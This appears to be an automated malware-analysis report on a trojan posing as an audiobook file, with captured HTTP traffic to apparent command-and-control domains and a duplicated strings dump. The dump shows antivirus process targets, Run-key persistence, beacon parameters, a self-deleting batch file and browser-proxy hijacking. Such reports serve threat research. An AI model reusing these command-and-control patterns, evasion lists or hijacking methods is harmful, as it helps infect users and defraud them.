<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM">here</a>.</p>.<hr>.<address>Apache Server at classicbattletech.com Port 80</address>.</body></html>...
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 12 Mar 2014 20:20:10 GMT
Accept-Ranges: bytes
ETag: "0b96c77303ecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 54007
Cache-Control: max-age=6822
Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
MSCF............,...................I.................lDxa .authroot.stl......8..CK...<T...g.v!M.d..f.%d..}K..5..F..d'K......%K..%...!..=.k..........{=/....{g.~..........<.....h..b...8..Ep.x.....G. .....pq..``a.i|"n|8...!..gv...: I........!...%$....;PBHA.....!A....L...'...:..0...I....fD"N#...._..?....E..m..1\.$...{P....:......../...\YB.m:.....dE.....)...V....$....Dn:....0E..S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@....x"....T..H...<.CQ..H.M.K.".H....`.....!.G....AF\.{...V..LCy.i y..Q.'..M...bE.%..<...nG.3..\K.t..ah...5Z~.h...8..@.).... ....X...v..,.-.M..u.......Z"..U...0:O%..}.(t............=R.......[b...z.....8..)........M|..g..L.a...>....[.E&..{..|..t...[t..B......./[..&.L`.w....[L..ZW.... ."....<...I.G\.H[:...B.B.qT... ..(....: U....(.J.....?._..'..Hp..o.B......!......bj.G.u^.%\r..b...*7.[nO..S...b.l@jn. .Hb...M.....9.....8.='...)\.....M.#.M......L.Jh.../..G.!\.Y....&.....P^...,..U..3...W...._...0..?*...KZ....fM...8.6U..aG.a.......~....?.N. .3.....,>.rH..*O..E..T0.......?i...k.T.'>".....E....%SK.v..8...t.:...].E.K2....u..../i.t.9....2N..QI ..h..t..Ad....0.........*...R......|......7A:bP. n:.......Fk.[q....]D.......3.0.)...G]..?4.o...p......?...3....@..jn#.n\.-....p.T..G............4.......:H....2..9.|.`~0GL.=....u.y...L0iL.....A....^.=_.....5.=.=n.@....Hu..r#.T...{.......P.....[..j.....i.%...d...h.........c......9m...@.....W.p.E.5.@......]%..g.1..3Z6^<!.Q...m......9....l..x.....$7..[.....L........L....F*....D.U.'...
<<
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
1401CF3DB40B609892..
GET /logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 HTTP/1.0
Connection: close
Host: worldorderlive.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1420
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=81
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.worldorderlive.com; path=/; expires=Sun, 30-Mar-2014 01:55:28 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>worldorderlive.com</title>. <meta name="keywords" content="worldorderlive.com" />. <meta name="description" content="worldorderlive.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A" name="worldorderlive.com">. </frameset>. <noframes>..<body><a href="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A">Click here to go to worldorderlive.com</a>.</body>
<<
<<< skipped >>>
Map
Strings from Dumps
Clive Barker - Books Of Blood 03.exe_172:
.text
`.rdata
@.data
@.rsrc
WSSSSh
^SShq
SSSh4&A
SSh<'A
%.*s(%d)%s
rtmp%d
<head><meta http-equiv="content-type" content="text/html; charset=
shlwapi.dll
%s %s
%s %s %s
GETPASSWORD1
%s%s%d
Software\Microsoft\Windows\CurrentVersion
%s.%d.tmp
winrarsfxmappingfile.tmp
-el -s2 "-d%s" "-p%s" "-sp%s"
__tmp_rar_sfx_access_check_%u
sfxcmd
COMCTL32.DLL
riched20.dll
riched32.dll
COMCTL32.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
USER32.dll
GDI32.dll
COMDLG32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHFileOperationA
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
WINRAR.SFX
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe
:(,4;<=>;?@
3,45657879
8888888888887
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
Shell.Explorer
Enter password
&Enter password for the encrypted file:
Extracting %s
Skipping %s
The file "%s" header is corrupt%The archive comment header is corrupt
Unknown method in 
%s
Cannot open %s
Cannot create %s
Cannot create folder %s
6CRC failed in the encrypted file %s (wrong password ?)
CRC failed in %s
Packed data CRC failed in %s
Wrong password for %s5Write error in the file %s. Probably the disk is full
Read error in the file %s
Extracting from %s
ErroraErrors encountered while performing the operation
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
3R2R.exe_1728:
`.rsrc
PSSh$
SSShbU@
SSj%S
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" 
%s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
http://
POST %s HTTP/1.1
Host: %s
User-Agent: mozilla/2.0
Content-Length: %u
POST http://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.1 200 
OK</pre><pre>%s?tq=%s</pre><pre>id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111</pre><pre>%s_%s_%d</pre><pre>_1_%d</pre><pre>_2_%d</pre><pre>_3_%d</pre><pre>_4_%d</pre><pre>http://worldorderlive.com</pre><pre>http://rumperstumprs.com</pre><pre>http://transaerosystems.com</pre><pre>http://freeridershools.com</pre><pre>http://ourbigdrophills.com</pre><pre>http://mydbonlineaccess.com</pre><pre>http://onlinepdahelpforyou.com</pre><pre>http://remarkreddomas.com</pre><pre>http://transfersakkonline.com</pre><pre>http://backupdomaintolevel.com</pre><pre>SELECT_RESERV_SRV_%d</pre><pre>%s_%d_%s</pre><pre>id=%s&c=%d</pre><pre>%s_%d_%d_%d</pre><pre>%s_%d_%d</pre><pre>%s %s</pre><pre>%s start%s%c%s</pre><pre>c1.exe</pre><pre>c2.exe</pre><pre>c3.exe</pre><pre>DWN_CON_STRP_%d_%s</pre><pre>http://%d.ctrl.%s</pre><pre>logo.png</pre><pre>img/135.png</pre><pre>img/136.png</pre><pre>t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d</pre><pre>t=%s&q=&s=%d&hrs=%d</pre><pre>%s/%s?tq=%s&pr=%d</pre><pre>%s:%d/%s?tq=%s&pr=%d</pre><pre>http://armoredlegion.com/305986.png</pre><pre>http://armoredlegion.com/16354.png</pre><pre>http://armoredlegion.com/716354_m61.png</pre><pre>http://mektek.net/thelab/wiley.jpg</pre><pre>http://knowledgesutra.com/img/temp/hi.cgi</pre><pre>http://knowledgesutra.com/img/temp/head.png</pre><pre>http://battleon.com/134.gif</pre><pre>http://battleon.com/132.gif</pre><pre>http://battleon.com/133.gif</pre><pre>http://browsermmorpg.com/images/cpc.png</pre><pre>http://browsermmorpg.com/images/cpc2.png</pre><pre>http://browsermmorpg.com/img/intel.gif</pre><pre>http://browsermmorpg.com/img/intel.jpg</pre><pre>http://012webpages.com/christian12.jpg</pre><pre>http://012webpages.com/christian13.jpg</pre><pre>http://012webpages.com/christian14.jpg</pre><pre>http://tri-countymech.com/g/livechat.png</pre><pre>http://tri-countymech.com/g/logo.png</pre><pre>http://tri-countymech.com/g/133.jpg</pre><pre>http://tri-countymech.com/g/134.jpg</pre><pre>http://electronicstheory.com/pics/valley.png</pre><pre>
http://electronicstheory.com/pics/sun.png</pre><pre>http://classicbattletech.com/lhous3.gif</pre><pre>http://classicbattletech.com/lhous4.gif</pre><pre>http://classicbattletech.com/lhous5.gif</pre><pre>http://classicbattletech.com/lhous6.gif</pre><pre>http://engineeringcrossing.com/images/misc/23525.png</pre><pre>http://engineeringcrossing.com/images/misc/64646.png</pre><pre>t=t&hrs=%d&q=id=1000&ver=%s&s=%d</pre><pre>t=ip&hrs=%d&q=&s=1</pre><pre>%s?pr=%s</pre><pre>\bl%d_64.bat</pre><pre>del "%s"</pre><pre>if exist "%s" goto a</pre><pre>cmd.exe /c "%s"</pre><pre>%s.zl</pre><pre>{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d</pre><pre>{C66E79CE-8935-4ed9-A6B1-4983619CB925}</pre><pre>{61B98B86-5F44-42b3-BCA1-33904B067B81}</pre><pre>{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}</pre><pre>{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}</pre><pre>GET %s HTTP/1.0</pre><pre>http://xprstats.com/images/logo.png</pre><pre>drweb</pre><pre>id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d</pre><pre>t=ml&q=%s</pre><pre>xprstats.com</pre><pre>http://%s%s</pre><pre>ldr.ini</pre><pre>reportfrommains.com</pre><pre>http://%s/s.php?c=121&id=%s</pre><pre>onlinereportsystem.com</pre><pre>%s_1_%d_%s</pre><pre>%s_2_%d_%s</pre><pre>%s_3_%d_%s</pre><pre>%s_4_%d_%s</pre><pre>pmv=2&id=%s&hwid=%s</pre><pre>u.exe</pre><pre>%s up%s</pre><pre>&%s=%s</pre><pre>PRM_LSTN_THIS_PORT</pre><pre>127.0.0.1</pre><pre>HTTP/1.x</pre><pre>google.com</pre><pre>http://www.google.com</pre><pre>HTTP/1.1 302 Found</pre><pre>Location: %s</pre><pre>id=%s&type=%d&ppcid=%s</pre><pre>%s: %s</pre><pre>%s_5_%s</pre><pre>http=127.0.0.1:</pre><pre>prefs.js</pre><pre>Mozilla</pre><pre>"network.proxy.http"</pre><pre>"network.proxy.http_port"</pre><pre>"network.proxy.type"</pre><pre>"127.0.0.1"</pre><pre>%s(%s, %s);</pre><pre>operaprefs.ini</pre><pre>Opera</pre><pre>Use HTTP</pre><pre>HTTP 
server</pre><pre>127.0.0.1:%s</pre><pre>%s=%s</pre><pre>%s:%s</pre><pre>hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s</pre><pre>id=%s&hwid=%s</pre><pre>exec|%s</pre><pre>http=</pre><pre><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></pre><pre>bing.com</pre><pre>yahoo.com</pre><pre>search.aol.</pre><pre>suche.aol.</pre><pre>searcht2.aol.</pre><pre>.yimg.com</pre><pre>.bing.net</pre><pre>scorecardresearch.com</pre><pre>brightcove.com</pre><pre>.aol.</pre><pre>.atwola.</pre><pre>.ivwbox.</pre><pre>.google</pre><pre>.atdmt.</pre><pre>.abmr.</pre><pre>.tacoda.</pre><pre>.adtechus.</pre><pre>.autodatadirect.</pre><pre>.mapquestapi.</pre><pre>.ggpht.</pre><pre>.virtualearth.</pre><pre>.opera.</pre><pre>.microsoft.</pre><pre>.wsod.</pre><pre>.doubleclick.</pre><pre>.ypcdn.</pre><pre>.truveo.</pre><pre>.tlowdb.</pre><pre>mapq.st</pre><pre>.dartsearch.</pre><pre>.thawte.</pre><pre>http://</pre><pre>bing.com/search</pre><pre>search.yahoo.com/search</pre><pre>%s_1_%s</pre><pre>err%d%s_%d_%d</pre><pre>err0%s_%d_%d</pre><pre>ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d</pre><pre>%s:443/%s</pre><pre>%s_2_%s</pre><pre>%s_%s_%s</pre><pre>%s_3_%s</pre><pre>www.www.ru</pre><pre>https://</pre><pre>.doubleclick.net</pre><pre>doubleclick.net</pre><pre>msn.com</pre><pre>%s_0%d_%d</pre><pre>=='undefined'?'%s':'%s'
SSh<'A</pre><pre>%.*s(%d)%s</pre><pre>rtmp%d</pre><pre><head><meta http-equiv="content-type" content="text/html; charset=</pre><pre>shlwapi.dll</pre><pre>%s %s</pre><pre>%s %s %s</pre><pre>GETPASSWORD1</pre><pre>%s%s%d</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>%s.%d.tmp</pre><pre>winrarsfxmappingfile.tmp</pre><pre>-el -s2 "-d%s" "-p%s" "-sp%s"</pre><pre>__tmp_rar_sfx_access_check_%u</pre><pre>sfxcmd</pre><pre>COMCTL32.DLL</pre><pre>riched20.dll</pre><pre>riched32.dll</pre><pre>COMCTL32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>RegCloseKey</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteExA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>WINRAR.SFX</pre><pre>d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb</pre><pre>C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe</pre><pre>:(,4;<=>;?@</pre><pre>3,45657879</pre><pre>8888888888887</pre><pre>version="1.0.0.0"</pre><pre><requestedExecutionLevel level="asInvoker"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre><!--The ID below indicates application support for Windows Vista --></pre><pre><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></pre><pre><!--The ID below indicates application support for Windows 7 --></pre><pre><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></pre><pre><asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"></pre><pre></asmv3:windowsSettings></pre><pre>Shell.Explorer</pre><pre>Enter password</pre><pre>&Enter password for the encrypted file:</pre><pre>Extracting %s</pre><pre>Skipping %s</pre><pre>The file "%s" header is corrupt%The archive comment header is corrupt</pre><pre>Unknown method in 
%s</pre><pre>Cannot open %s</pre><pre>Cannot create %s</pre><pre>Cannot create folder %s</pre><pre>6CRC failed in the encrypted file %s (wrong password ?)</pre><pre>CRC failed in %s</pre><pre>Packed data CRC failed in %s</pre><pre>Wrong password for %s5Write error in the file %s. Probably the disk is full</pre><pre>Read error in the file %s</pre><pre>Extracting from %s</pre><pre>ErroraErrors encountered while performing the operation</pre><pre>Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.</pre><b>3R2R.exe_1728:</b><pre>`.rsrc</pre><pre>PSSh$</pre><pre>SSShbU@</pre><pre>SSj%S</pre><pre><%u,V</pre><pre><3%u1f</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler</pre><pre>1.2.5</pre><pre>inflate 1.2.5 Copyright 1995-2010 Mark Adler</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>\sc.exe</pre><pre>ntdll.dll</pre><pre>iexplore.exe</pre><pre>opera.exe</pre><pre>firefox.exe</pre><pre>safari.exe</pre><pre>chrome.exe</pre><pre>AVGIDSMonitor.exe</pre><pre>AVGIDSAgent.exe</pre><pre>avgchsvx.exe</pre><pre>avgemcx.exe</pre><pre>avgnsx.exe</pre><pre>avgrsx.exe</pre><pre>avgtray.exe</pre><pre>avgwdsvc.exe</pre><pre>avgnt.exe</pre><pre>ccsvchst.exe</pre><pre>AvastUI.exe</pre><pre>mcagent.exe</pre><pre>SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</pre><pre>SOFTWARE\Microsoft\Windows Defender</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>explorer.exe</pre><pre>Windows Security Center</pre><pre>%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center</pre><pre>rundll32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Defender</pre><pre>at %d:%d "%s" 
%s</pre><pre>win32iexplore.exe</pre><pre>win32opera.exe</pre><pre>win32firefox.exe</pre><pre>win32safari.exe</pre><pre>win32winword.exe</pre><pre>win32excel.exe</pre><pre>win32outlook.exe</pre><pre>win32photoshop.exe</pre><pre>win32wmplayer.exe</pre><pre>win32java.exe</pre><pre>win32itunes.exe</pre><pre>win32msmsgs.exe</pre><pre>java.exe</pre><pre>*.log</pre><pre>%s:\windows\system32\%s.tmp</pre><pre>%s:\windows\syswow64\%s.tmp</pre><pre>%s:\WINNT\system32\%s.tmp</pre><pre>%s:\WINNT\syswow64\%s.tmp</pre><pre>Find Temporary files is %d</pre><pre>cannot open files %s, Open next files ?</pre><pre>{A1D429DE-B782-4253-84AD-6E09A8438AD5}</pre><pre>\Windows NT</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>%s\%s</pre><pre>%s.%s</pre><pre>stor.cfg</pre><pre>exec%s</pre><pre>{35BCA615-C82A-4152-8857-BCC626AE4C8D}</pre><pre>{4D92BB9F-9A66-458f-ACA4-66172A7016D4}</pre><pre>lvvm.exe</pre><pre>{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}</pre><pre>{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}</pre><pre>{6B985724-623F-492e-B0D6-C9715ADE853B}</pre><pre>{B37C48AF-B05C-4520-8B38-2FE181D5DC78}</pre><pre>{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}</pre><pre>Advapi32.dll</pre><pre>%s%s_1</pre><pre>%s_0_%d_%s</pre><pre>%s_%d</pre><pre>%s_%d_%d_%d_%d</pre><pre>%s_%s</pre><pre>http://</pre><pre>POST %s HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: mozilla/2.0</pre><pre>Content-Length: %u</pre><pre>POST http://%s%s HTTP/1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/1.1 200 
OK</pre><pre>%s?tq=%s</pre><pre>id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111</pre><pre>%s_%s_%d</pre><pre>_1_%d</pre><pre>_2_%d</pre><pre>_3_%d</pre><pre>_4_%d</pre><pre>http://worldorderlive.com</pre><pre>http://rumperstumprs.com</pre><pre>http://transaerosystems.com</pre><pre>http://freeridershools.com</pre><pre>http://ourbigdrophills.com</pre><pre>http://mydbonlineaccess.com</pre><pre>http://onlinepdahelpforyou.com</pre><pre>http://remarkreddomas.com</pre><pre>http://transfersakkonline.com</pre><pre>http://backupdomaintolevel.com</pre><pre>SELECT_RESERV_SRV_%d</pre><pre>%s_%d_%s</pre><pre>id=%s&c=%d</pre><pre>%s_%d_%d_%d</pre><pre>%s_%d_%d</pre><pre>%s %s</pre><pre>%s start%s%c%s</pre><pre>c1.exe</pre><pre>c2.exe</pre><pre>c3.exe</pre><pre>DWN_CON_STRP_%d_%s</pre><pre>http://%d.ctrl.%s</pre><pre>logo.png</pre><pre>img/135.png</pre><pre>img/136.png</pre><pre>t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d</pre><pre>t=%s&q=&s=%d&hrs=%d</pre><pre>%s/%s?tq=%s&pr=%d</pre><pre>%s:%d/%s?tq=%s&pr=%d</pre><pre>http://armoredlegion.com/305986.png</pre><pre>http://armoredlegion.com/16354.png</pre><pre>http://armoredlegion.com/716354_m61.png</pre><pre>http://mektek.net/thelab/wiley.jpg</pre><pre>http://knowledgesutra.com/img/temp/hi.cgi</pre><pre>http://knowledgesutra.com/img/temp/head.png</pre><pre>http://battleon.com/134.gif</pre><pre>http://battleon.com/132.gif</pre><pre>http://battleon.com/133.gif</pre><pre>http://browsermmorpg.com/images/cpc.png</pre><pre>http://browsermmorpg.com/images/cpc2.png</pre><pre>http://browsermmorpg.com/img/intel.gif</pre><pre>http://browsermmorpg.com/img/intel.jpg</pre><pre>http://012webpages.com/christian12.jpg</pre><pre>http://012webpages.com/christian13.jpg</pre><pre>http://012webpages.com/christian14.jpg</pre><pre>http://tri-countymech.com/g/livechat.png</pre><pre>http://tri-countymech.com/g/logo.png</pre><pre>http://tri-countymech.com/g/133.jpg</pre><pre>http://tri-countymech.com/g/134.jpg</pre><pre>http://electronicstheory.com/pics/valley.png</pre><pre>
http://electronicstheory.com/pics/sun.png</pre><pre>http://classicbattletech.com/lhous3.gif</pre><pre>http://classicbattletech.com/lhous4.gif</pre><pre>http://classicbattletech.com/lhous5.gif</pre><pre>http://classicbattletech.com/lhous6.gif</pre><pre>http://engineeringcrossing.com/images/misc/23525.png</pre><pre>http://engineeringcrossing.com/images/misc/64646.png</pre><pre>t=t&hrs=%d&q=id=1000&ver=%s&s=%d</pre><pre>t=ip&hrs=%d&q=&s=1</pre><pre>%s?pr=%s</pre><pre>\bl%d_64.bat</pre><pre>del "%s"</pre><pre>if exist "%s" goto a</pre><pre>cmd.exe /c "%s"</pre><pre>%s.zl</pre><pre>{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d</pre><pre>{C66E79CE-8935-4ed9-A6B1-4983619CB925}</pre><pre>{61B98B86-5F44-42b3-BCA1-33904B067B81}</pre><pre>{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}</pre><pre>{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}</pre><pre>GET %s HTTP/1.0</pre><pre>http://xprstats.com/images/logo.png</pre><pre>drweb</pre><pre>id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d</pre><pre>t=ml&q=%s</pre><pre>xprstats.com</pre><pre>http://%s%s</pre><pre>ldr.ini</pre><pre>reportfrommains.com</pre><pre>http://%s/s.php?c=121&id=%s</pre><pre>onlinereportsystem.com</pre><pre>%s_1_%d_%s</pre><pre>%s_2_%d_%s</pre><pre>%s_3_%d_%s</pre><pre>%s_4_%d_%s</pre><pre>pmv=2&id=%s&hwid=%s</pre><pre>u.exe</pre><pre>%s up%s</pre><pre>&%s=%s</pre><pre>PRM_LSTN_THIS_PORT</pre><pre>127.0.0.1</pre><pre>HTTP/1.x</pre><pre>google.com</pre><pre>http://www.google.com</pre><pre>HTTP/1.1 302 Found</pre><pre>Location: %s</pre><pre>id=%s&type=%d&ppcid=%s</pre><pre>%s: %s</pre><pre>%s_5_%s</pre><pre>http=127.0.0.1:</pre><pre>prefs.js</pre><pre>Mozilla</pre><pre>"network.proxy.http"</pre><pre>"network.proxy.http_port"</pre><pre>"network.proxy.type"</pre><pre>"127.0.0.1"</pre><pre>%s(%s, %s);</pre><pre>operaprefs.ini</pre><pre>Opera</pre><pre>Use HTTP</pre><pre>HTTP 
server</pre><pre>127.0.0.1:%s</pre><pre>%s=%s</pre><pre>%s:%s</pre><pre>hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s</pre><pre>id=%s&hwid=%s</pre><pre>exec|%s</pre><pre>http=</pre><pre><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></pre><pre>bing.com</pre><pre>yahoo.com</pre><pre>search.aol.</pre><pre>suche.aol.</pre><pre>searcht2.aol.</pre><pre>.yimg.com</pre><pre>.bing.net</pre><pre>scorecardresearch.com</pre><pre>brightcove.com</pre><pre>.aol.</pre><pre>.atwola.</pre><pre>.ivwbox.</pre><pre>.google</pre><pre>.atdmt.</pre><pre>.abmr.</pre><pre>.tacoda.</pre><pre>.adtechus.</pre><pre>.autodatadirect.</pre><pre>.mapquestapi.</pre><pre>.ggpht.</pre><pre>.virtualearth.</pre><pre>.opera.</pre><pre>.microsoft.</pre><pre>.wsod.</pre><pre>.doubleclick.</pre><pre>.ypcdn.</pre><pre>.truveo.</pre><pre>.tlowdb.</pre><pre>mapq.st</pre><pre>.dartsearch.</pre><pre>.thawte.</pre><pre>http://</pre><pre>bing.com/search</pre><pre>search.yahoo.com/search</pre><pre>%s_1_%s</pre><pre>err%d%s_%d_%d</pre><pre>err0%s_%d_%d</pre><pre>ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d</pre><pre>%s:443/%s</pre><pre>%s_2_%s</pre><pre>%s_%s_%s</pre><pre>%s_3_%s</pre><pre>www.www.ru</pre><pre>https://</pre><pre>.doubleclick.net</pre><pre>doubleclick.net</pre><pre>msn.com</pre><pre>%s_0%d_%d</pre><pre>=='undefined'?'%s':'%s'
